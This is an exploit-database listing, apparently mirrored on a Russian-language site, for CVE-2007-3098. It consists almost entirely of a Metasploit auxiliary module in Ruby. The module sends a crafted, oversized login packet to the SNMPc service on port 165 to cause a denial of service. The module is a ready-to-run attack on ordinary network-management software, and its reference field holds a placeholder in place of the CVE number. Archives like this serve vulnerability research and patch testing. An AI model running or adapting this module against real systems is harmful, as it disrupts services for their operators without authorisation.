- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 4033
- Проверка EDB
-
- Пройдено
- Автор
- EN DOULI
- Тип уязвимости
- DOS
- Платформа
- WINDOWS
- CVE
- cve-2007-3098
- Дата публикации
- 2007-06-04
Код:
##
# $Id: snmpc.rb 2007-06-03 $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##
require 'msf/core'
module Msf
class Auxiliary::Dos::Windows::Snmpc < Msf::Auxiliary
include Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'SNMPc ',
'Description' => %q{
This module sends a specially-crafted packet to the service login of snmpc
causing a denial of service of snmpc.
},
'Author' => [ 'En Douli, Tks to OaiTeam <[email protected]>' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 1 $',
'References' =>
[
[ 'CVE', 'XXXXXXX' ],
]))
register_options([Opt::RPORT(165),], self.class)
end
def run
connect
init = "\x14\x00\x00\x00\x70\xa9\x00\x00\x51\x03\x00\x00\x02\x00\x00\x00\x72\x63\x6f\x6e"
pkt = "\x29\x00\x00\x00\xbc\xee\x00\x00\x52\x03\x00\x00\x02\x00\x00\x00\x41\x64\x6d\x69\x6e\x69\x73\x74\x72\x61\x74"
pkt << "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" * 56
pkt << "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x09"
pkt << "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" * 35
pkt << "\x41\x41\x41\x41\x41\x41\x41\x41\x09\x30\x00"
print_status("Sending dos packet ... ")
sock.put(init)
sock.put(pkt)
disconnect
end
end
end
# milw0rm.com [2007-06-04]
- Источник
- www.exploit-db.com